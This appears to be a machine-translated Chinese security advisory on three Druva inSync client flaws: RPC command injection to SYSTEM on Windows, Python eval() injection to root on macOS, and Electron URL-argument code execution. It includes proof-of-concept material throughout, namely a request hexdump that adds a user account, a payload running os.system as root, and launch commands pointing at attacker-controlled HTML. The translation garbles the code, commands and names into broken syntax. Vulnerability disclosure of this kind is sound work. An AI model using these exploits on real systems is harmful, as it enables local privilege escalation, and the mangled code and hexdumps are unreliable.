Druva inSync系统客户端多个漏洞

cve - 2019 - 3999: Druva inSyncCPHwnet64 inSync系统客户端。exe RPC请求类型5未经身份验证的操作系统命令注入——当地特权升级(Windows)

Windows Druva inSync系统客户服务(inSyncCPHwnet64.exe)包含一个命令注入漏洞,可以利用当地的未经身份验证的攻击者与系统权限执行操作系统命令。

当处理RPC类型5请求通过TCP端口6064,inSyncCPHwnet64。exe不正确验证请求数据传递到CreateProcessW之前()函数。通过发送一个精心制作的RPC请求,攻击者可以提升系统权限。

概念验证

下面是一个hexdump的请求发送到利用此漏洞,执行命令“网络用户/添加站得住脚的”

63 69 6 e 53 79 6 e 00000000 20 50 48 43 20 52 50 43 57 5 b inSync系统P HC RPCW [00000010 76 30 30 30 32 5 d v0002] 00000016 05 00 00 00 ....0000001 2 00 00 00 *……65 e 6 e 00 0000001 74 00 00 00 75 73 00 00 65 72 00 00 n.e.t。。u.s.e.r。0000002 e 20 00 2 f 00 61 00 64 64 00 65 74 00 00 00 00。/ .a.d。d。.t.e。0000003 e 6 e 00 61 62 00 00 6 c 65 00 00 n.a.b.l. e。

这是在inSyncCPH相应的日志条目。日志显示成功的开发尝试。注意,命令执行网络用户/添加站得住脚的。

20/12/2019 11:17:38:sysstate请求创建一个过程。转换:21日cmd:网络用户/添加站得住脚的20/12/2019 11:17:38:退出代码sysstate过程是0,返回值是1

cve - 2019 - 4000: Druva inSync系统客户端inSyncDecommission守护进程。set_file_acl验证Python代码注入(Mac OS)

inSyncDecommission过程容易Python代码注入通过RPC服务可以通过TCP端口6059。具体来说,守护进程。set_file_acl Python方法将用户输入传递给eval()函数。这个漏洞可以利用当地的,验证攻击者使用root特权执行任意Python代码。

反编译daemon_set_file_acl函数后,我们相信函数源代码如下。注意到acl参数传递给eval()没有验证:

def daemon_set_file_acl(未知、帧,acl、user_uid user_gid):试题:(模式、uid、gid) = eval (acl) #不安全调用eval()如果不是stat.S_ISLNK(模式):操作系统。chmod(帧模式)如果uid:操作系统。lchown(帧、user_uid user_gid)其他:操作系统。lchown(帧、uid、gid)除了异常故障:SyncLog。错误(“不能设置acl文件% s,错误:% s的,帧,str(断层))SyncLog.dtraceback(断层)提高返回None

概念验证

这是一个示例PoC的调用。注意ROOT_OWNED成立,它是由根。

史酷比$ ls - l /私人总0史酷比python insync_rpc_set_acl_auth_exploit美元/ tmp。py 7 u0ipcrhaudqbchfptnx”操作系统。系统(“触摸/ tmp / ROOT_OWNED”)“史酷比$ ls - l /私人/ tmp总0 -rw-r - r - 1根轮0 12月27日11:15 ROOT_OWNED

cve - 2019 - 4001:电子应用程序命令行参数错误配置

inSync系统电子应用程序中配置这样一个恶意的本地用户的上下文中可以执行任意代码NodeJS inSync系统客户端过程。攻击者可以做到这一点,推出inSync系统与一个URL参数指向一个包含NodeJS attacker-controlled HTML文件的代码。

请注意,这个文件也可以指向一个远程位置(例如,http://12.34.56.78/index.html)。

注意,这个漏洞也可以用于读取服务令牌从MacOS钥匙扣,随后,它可能被利用结合cve - 2019 - 4000升级特权根。

下面我贴main.js脆弱的代码片段。注意,命令行参数的值分配给inSyncURL没有任何验证。这使得电子应用程序来执行任何指定的文件中。

如果(os.platform() = =“达尔文”){如果(过程。argv [3] = =“no_rfs”) {/ / TODO发射如果没有参数inSyncURL =过程。argv [1] windowType =过程。argv [2]}else { inSyncURL = process.argv[2] windowType = process.argv[3] } } else { if(process.argv[1] == null) { var child = spawn(path.join(__dirname, '..', '..', '..', '..', 'inSyncAgent.exe'), ['configure'], {detached: true}); app.quit() return } inSyncURL= process.argv[1] windowType = process.argv[2] }

概念验证

(Mac OS)打开/应用程序/ Druva \ inSync.app /内容/资源/ inSync系统。应用程序——args”文件:/ / /用户/ myuser /索引。html“主要no_rfs (Windows)“C: \程序文件(x86)电子\ Druva \ inSync系统\ \ inSyncClient \ inSync系统。exe”文件:/ / C: /用户/ myuser /索引。html主要no_rfs